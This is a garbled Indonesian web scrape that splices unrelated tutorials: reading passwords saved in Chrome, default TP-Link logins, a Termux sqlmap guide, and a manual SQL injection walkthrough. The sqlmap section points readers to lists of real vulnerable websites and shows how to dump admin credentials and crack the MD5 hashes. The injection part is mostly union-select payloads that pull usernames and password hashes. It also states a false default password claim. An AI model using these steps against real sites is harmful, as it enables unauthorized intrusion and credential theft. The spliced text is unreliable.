Kemudian masukkan kata kunci “ Reset Password e-Dabu ” di kolom pencarian atau buka laman Setelah itu, masukkan username e-Dabu, email yang digunakan untuk mendaftar e-Dabu dan kode captcha yang tertera. Jika sudah tinggal tekan kirim email.
Sebagai makhluk yang sering pelupa, wajar rasanya jika kita kesal dengan diri kita sendiri yang tidak bisa mengingat banyak hal, dalam kasus ini adalah sebuah akun Login berupa Username dan Password yang mungkin saja sangat anda perlukan saat ini untuk bisa di akses. Mungkin bisa itu akses ke sebuah situs, penyimpanan berbasis Cloud hingga Email, tetapi jika anda tahu caranya maka sebenarnya anda tidak perlu selalu mengingat dan mencatat Username dan Password Login yang telah anda buat, meski demikian mengingat dan mencatat akun Login itu memang selalu saya anjurkan, jika anda seorang tipe yang tidak suka mengingat maka cara yang akan saya bahas kali ini akan sangat berguna untuk anda. Seperti judul yang sudah saya tulis diatas, benar saja cara satu ini bisa di gunakan untuk melihat Password dan Username yang telah anda buat sebelumnya, hanya saja ada beberapa kondisi yang harus di penuhi terlebih dahulu, yaitu adalah sebagai berikut 1. Harus menggunakan Google Chrome 2. Ketika anda sudah membuat akun, anda mengijinkan Google Chrome untuk menyimpan Username dan Password yang sudah anda buat. 3. Anda harus tahu Password Administrator di PC/ Laptop anda. Ingat! ketika salah satu kondisi di atas tidak bisa anda penuhi atau tidak terpenuhi, maka sudah pasti cara ini tidak akan bisa berkerja, namun jika anda sudah yakin bahwa kondisi diatas sudah anda penuhi, maka anda bisa dengan mudah melihat Username dan Password dengan cara berikut 1. Silahkan buka Google Chrome dan masuk ke menu Settings. 2. Disini saya menggunakan Google Chrome versi terbaru 2018, selanjutnya buka menu Password. Jika anda menggunakan versi Google Chrome lawas, maka menu untuk melihat akun Login masih tetap saja bernama Password, hanya saja letaknya berbeda, di Google Chrome lawas, letaknya di bagian Advanced atau jika ingin mudah silahkan saja tekan pencarian lalu ketikan Password, atau langsung akses kesini chrome//settings/passwords. anda akan melihat list di website mana saja anda pernah Login dan menginjinkan Chrome untuk menyimpan data akun tersebut, silahkan cari akun Login di Website mana yang anda lupa, lalu tekan icon "Mata". 4. Setelahnya anda akan di minta untuk memasukan Password Administrator yang telah di buat di PC/Laptop yang anda miliki, jika ini adalah Laptop/PC baru dan belum pernah di Install ulang OS sama sekali atau anda menyerahkan Install ulangnya ke tempat service, maka harusnya Passwordnya adalah "Admin". 5. Disini anda sudah bisa melihat Password yang anda lupakan sebelumnya. 6. Done! Memang sangat mudah jika anda tahu caranya, sebenarnya cara ini akan sangat hebat jika fitur Sync-nya anda aktifkan ke Gmail anda yang aktif, karena semua informasi login melalui Google Chrome yang telah anda buat di manapun seperti di Smartphone, PC, dll tetap akan tersimpan di direktori ini. Sehingga percaya tidak percaya akun yang telah saya buat 4 tahun lalu masih bisa saya temukan di fitur Password tersebut. Tags Komputer Tutorial Rada belagu sih, tapi ngangenin!
3 Gunakan Menu Pertemanan Facebook. 4. Manfaatkan Google Foto. Cara Menemukan Data Dari Akun Penipu. Mungkin pengguna pernah mengalami hal tak mengenakkan dengan salah satu akun Instagram. Hingga mungkin pengguna ingin meminta pertanggungjawaban atau semacamnya pada akun tersebut. Bila lupa, maka pengguna bisaBeranda » Android » Hacking » Termux » Tools » Trik » Cara Mendapatkan Username & Password dengan Sqlmap di Termux Pada tutorial kali ini kami akan sharing bagaimana cara mendapatkan Username & Password dengan Sqlmap di android. Cara ini sebagai referensi untuk kamu yang tidak ada laptop / Pc . Untuk media belajar SQL . Oke langsung ke tutorialnya Kamu langsung download termux di android melalui google playstore. Setelah aplikasi terinstal kamu ikuti perintah di bawah ini . Ketikkan $ apt update -y && apt upgrade -y $ pkg install nano -y $ pkg install git -y $ pkg install python -y $ pkg install python2 -y lalu kamu install SQLmap nya. Ketikkan $ git clone $ cd sqlmap $ python2 Jika sudah terinstal semua kamu bisa belajar dork pada post ini DORK AMPUH SENJATA DEFACE untuk mendapatkan target yang fresh. Atau jika kamu langsung ingin mendapatkan target kamu bisa mengambilnya pada post ini KUMPULAN WEBSITE SQL 2019 Disini kami memilih target lalu ketikkan pada termux $ python2 -u -dbs * Perintah ini digunakan untuk mencari database apa saja yang ada di website tersebut SQLmap mendapatkan 5 database yang ada didalam website tersebut. Lalu kita akan memilih database cn_db untuk mendapatkan informasi Tables . Ketikkan $ python2 -u -tables -D cn_db * Perintah di atas digunakan untuk melihat tables pada database yang di hasilkan oleh -dbs Disini kami mendapatkan 5 tables pada database cn_db. Lalu untuk mendapatkan informasi Username dan Password, Biasanya ada di nama tables Admin / Password / User / Login dan kami disini akan mencoba untuk mencari columns Password . Ketikkan $ python2 -u -D cn_db -T Password -columns *perintah di atas digunakan untuk melihat columns database yang di hasilan dari -tables Password Dari tables password ada 4 columns yaitu id , loginname , password dan salt. Ini adalah informasi login di website tersebut. Oke untuk mengetahui informasinya kita akan dump columns nya . Ketikkan $ python2 -u -D cn_db -T Password -dump * perintah di atas digunakan untuk mengambil data base dari columns password di baris columns username&password Oke disini kami berhasil mendapatkan Informasi login username dan password di website tersebut. Password yang kami dapatkan masih berbentuk md5. Jika kamu ketemu password yang sudah terencrypt kamu harus crack password tersebut. SQLmap sebenarnya menyediakan untuk crack password tersebut akan tetapi menurut kami kurang begitu bagus. Kamu bisa crack password melalui crack station online yang ada di google Dan berikut adalah perintah dasar yang bisa kamu pakai di SQLmap python2 -u -dbs python2 -u -D NamaDataBase -tables python2 -u -D NamaDataBase -T NamaTables -columns python2 -u -D NamaDataBase -T NamaTables -C NamaColumns, USer -dump Oke cukup sekian tutorial Cara Mendapatkan Username & Password dengan Sqlmap di Termux sampai ketemu di tutorial selanjutnyaBukaweb browser, seperti google crome atau mozila firefox, lalu tuliskan IP TP Link di address bar, contohnya di sini lalu jika IP yang di tuliskan benar, maka akan muncul tampilan login tp link, di halaman login tersebut tuliskan username dan password default tp link, untuk username = admin, password = admin. Assalamualaikum teman – teman ketemu lagi dengan saya admin sharecodeweb . untuk tutorial kali ini akan di dijelaskan bagaimana caranya kita mendapatkan username atau password pada sebuah website atau yang biasa di sebut meng-hack 😀 kali ini kita akan menggunakan trik yang namanya “SQL INJECTION” dan cara ini dinilai mudah untuk newbie seperti saya 😀 hehe SQL injection adalah serangan yang memanfaatkan kelalaian dari website yang mengijinkan user untuk menginputkan data tertentu tanpa melakukan filter terhadap malicious character. okee next saja temen – temen .. sebelum kita praktik ada beberapa kebutuhan yang harus ada untuk tutorial kali ini . . mau tau apa aja . ??? Check this out Yet Another CMS sebagai target untuk percobaan nanti , bisa juga download di sini Xampp , karena kita akan coba menggunakan website yang ada di server local saja . hehe Text Editor Web Browser Oke . setelah temen – temen download CMSnya kemudian silahkan di extract ke folder C\xampp\htdocs\injection oke untuk lokasi foldernya saya ada di drive C\ kemudian nama foldernya bebas ya disini saya kasih nama foldernya dengan nama injection langkah selanjutnya konfigurasi . Silahkan buka file yang ada di includes/ selanjutnya edit code untuk mengkoneksikan folder kerja kita ke server . yang perlu diperhatikan disini adalah nama servernya localhost , username secara default root dan passwordnya secara default kosong. 2. buka phpmyadmin di web browser anda, kemudian masuk ke database injection nama database boleh bebas, jika belum ada silahkan di buat terlebih dahulu. kemudian import database yang telah di sediakan cms pada folder “database\ buka web browser lalu akses http//localhost/injection. oke sekarang objek yang mau kita serang udah ada nih 😀 hehe . Disini kita akan mencari dan menemukan dulu celah keamanannya dengan melakukan test standar. – http//localhost/injection/?page=1 – http//localhost/injection/?page=2 – http//localhost/injection/?page=3 lalu lakukan test pada salah satu parameterny * – http//localhost/injection/?page=-1 dengan menambahkan tanda min - sebelum angka id . selanjutnya kita akan mencari kolom dengan menggunakan perintah “order by”. order by 1– order by 2– order by 3– dst lakukan cara tersebut secara terus menerus sampai mendapatkan pesan error. setelah mendapatkan pesan error seperti pada gambar dibawah !, maka kita telah mengetahui jumlah kolom dari databasenya berita adalah 6 karena saat meminta untuk ORDER BY kolom ke 7 , terjadi error dengan kata lain , kolom ke 7 itu tidak ada . Setelah menemukan jumlah kolom , sekarang tugas kita adalah menemukan angka error sebagai celah untuk mengintip ke isi database caranya dengan menambahkan code ini “union all select 1,2,3,4,5,6–“.dari proses tersebut kemudian akan muncul angka error yaitu 3 dan 6. Selanjutnya kita akan mencari informasi dasar database , karena website target memiliki dua angka yang error , maka kita akan mencari dua informasi sekaligus , yaitu veri dari MySQL dan juga nama databasenya. ini adalah parameter yang digunakan “http//localhost/injection/?page=-1 union all select 1,2,version,4,5,database–“maka kita akan mendapatkan hasilnya dari gambar diatas kita mendapatkan nama database adalah “injection” dan versi dari MySQL-nya adalah Selanjutnya kita harus mencari nama – nama tabel yang ada di database dengan melakukan “group” pada nama – nama tabel di dalam database “injection” dengan menggunakan perintah “group_concat”.”http//localhost/injection/?page=-1 union all select 1,2,group_concattable_name,4,5,6 from where table_schema=database–“Maka akan dapat hasil seperti berikut pada gambar diatas kta telah berhasil menemukan nama tabelnya yaitu “pages” , “subjects” , dan “users”. Selanjutnya untuk membuka isi dari tabel tersebut , kita akan menerjemahkan nama tabelnya terlebih dahulu yaitu pada tabel “users” ke dalam format heksadesimal . untuk terjemahannya bisa kunjungi setelah diterjemahkan maka kita akan mendapatkan angka heksadesimalnya yaitu “75 73 65 72 73 “.kemudian masukan parameter berikut “http//localhost/injection/?page=-1 union select 1,2,group_concatcolumn_name,4,5,6 from where table_name=0x7573657273–“dari parameter di atas dapat hasil sebagai berikut nah .. dari gambar diatas, kita telah menemukan nama kolom dari tabel users, yaitu id, username, hashed_password. Selanjutnya kita akan melihat isi dari kolom suatu tabelnya dnegan langkah akhir adalah membuka isi kolomnya yang kita anggap ada nformasi login parameternya ”http//localhost/injection/?page=-1 union all select 1,2,concat_ws0x3a,username,hashed_password,4,5,6 from users–” dari gambar diata kita telah mengetahui username dan password adminnya. username kevin password f57b455e08f1daebf152a1e07cdd6c1d831993d6 berikutnya kita akan melakukan deskripsi hash passwordnya bisa ke alamat ini dari gambar diatas terdapat bahwa password admin adalah “forgetful”. 8. Langkah selanjutnya adalah mencari halaman login adminnya .http//localhost/injection/ setelah tadi kita dapatkan username dan passwordnya tadi silahkan dipakai untuk login . oke selamat mencoba temen – temen 🙂 KL1V92.